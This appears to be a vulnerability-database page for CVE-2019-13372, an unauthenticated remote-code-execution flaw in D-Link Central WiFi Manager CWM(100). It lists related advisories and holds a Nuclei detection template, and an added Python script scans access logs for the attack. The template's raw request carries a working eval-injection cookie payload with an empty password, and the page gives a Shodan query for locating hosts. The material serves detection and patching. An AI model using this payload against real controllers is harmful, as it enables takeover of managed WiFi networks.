| Title | Published | Views | Reporter |
|---|---|---|---|
| D-Link Central WiFi Manager CWM(100) Remote Code Execution Exploit | 18 Aug 2020 00:00 | – | zdt |
| The vulnerability in the /web/Lib/Action/IndexAction.class.php file of the software controller for D-Link Central WiFi Manager CWM(100) allows a hacker to execute arbitrary code. | 9 Oct 2019 00:00 | – | bdu_fstec |
| CVE-2019-13372 | 7 Jul 2019 01:59 | – | circl |
| D-Link Central WiFi Manager (CWM-100) Remote Code Execution Vulnerability | 8 Jul 2019 00:00 | – | cnvd |
| D-Link Central WiFiManager CWM-100 Remote Code Execution (CVE-2019-13372) | 13 Nov 2022 00:00 | – | checkpoint_advisories |
| CVE-2019-13372 | 6 Jul 2019 22:54 | – | cve |
| CVE-2019-13372 | 6 Jul 2019 22:54 | – | cvelist |
| D-Link Central WiFi Manager CWM(100) RCE | 18 Aug 2020 17:41 | – | metasploit |
| CVE-2019-13372 | 6 Jul 2019 23:15 | – | nvd |
| CVE-2019-13372 | 6 Jul 2019 23:15 | – | osv |
```yaml
id: CVE-2019-13372

info:
  name: D-Link Central WiFi Manager CWM(100) - Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    /web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code via cookie manipulation, leading to complete compromise of the D-Link Central WiFi Manager and potential access to all managed WiFi networks.
  remediation: |
    Update D-Link Central WiFi Manager to version 1.03R0100_BETA6 or later.
  reference:
    - https://github.com/unh3x/unh3x.github.io/blob/master/_posts/2019-02-21-D-link-%28CWM-100%29-Multiple-Vulnerabilities.md
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117
    - https://unh3x.github.io/2019/02/21/D-link-%28CWM-100%29-Multiple-Vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13372
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-13372
    cwe-id: CWE-94
    epss-score: 0.80682
    epss-percentile: 0.99575
    cpe: cpe:2.3:a:dlink:central_wifimanager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: central_wifimanager
    shodan-query: html:"D-Link Central WiFiManager"
  tags: cve,cve2019,d-link,wifimanager,vkev,vuln

variables:
  string: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        GET /index.php/Index/index HTTP/1.1
        Host: {{Hostname}}
        Cookie: username=',0,"",1,"0")%3becho%20"{{string}}"%3b//";password=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{string}}"
          - "/public/css/"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009dc3bc2abd8b75ad3475834673056480c125d03fb6ba9eab10980f91d2050bba02207cc3cf268da991102463e855cd8f0c27c3fccbf04edcbd079592a8f0725c8fd5:922c64590222798bb761d5b6d8e72950
```
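The cookie the template sends is also the pattern a defender wants to spot in access logs of a CWM(100) host. The following is an added example, not part of the template or the Vulners page: it parses constructed request-log lines, URL-decodes the Cookie header, and flags a username value that breaks out of its quoted string, plus the empty password the description says bypasses authentication. The log format (`METHOD PATH STATUS COOKIE`) and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page), one request per
# line: method, path, status, raw Cookie header ("-" when no cookie was sent).
SAMPLE_LOG = """\
GET /index.php/Index/index 200 username=admin;password=s3cret
GET /index.php/Index/index 200 username=',0,"",1,"0")%3becho%20"abcdefghij"%3b//";password=
GET /index.php/Index/index 200 username=alice;password=
GET /public/css/main.css 200 -
"""

# A quote that closes the string literal, followed later by a ')' or ';'
# that ends the call or statement: the shape of the eval injection.
QUOTE_BREAKOUT = re.compile(r"""['"].*[;)]""")


def parse_cookie(raw):
    """Split a raw Cookie header into a dict, URL-decoding each value."""
    jar = {}
    for part in raw.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        jar[name] = unquote(value)
    return jar


def classify(cookie):
    """Return the findings for one parsed cookie jar (empty list if benign)."""
    findings = []
    if QUOTE_BREAKOUT.search(cookie.get("username", "")):
        findings.append("username-eval-injection")
    # An explicitly empty password is the auth bypass named in the description.
    if cookie.get("password") == "":
        findings.append("empty-password")
    return findings


def scan_log(text):
    """Return (path, findings) for every request whose cookie is suspicious."""
    hits = []
    for line in text.splitlines():
        _method, path, _status, raw_cookie = line.split(" ", 3)
        if raw_cookie == "-":
            continue
        findings = classify(parse_cookie(raw_cookie))
        if findings:
            hits.append((path, tuple(findings)))
    return hits
```

Run against a real log, a hit carrying both findings on `/index.php/Index/index` is the exploitation attempt; an `empty-password` hit alone is still worth reviewing on an unpatched controller.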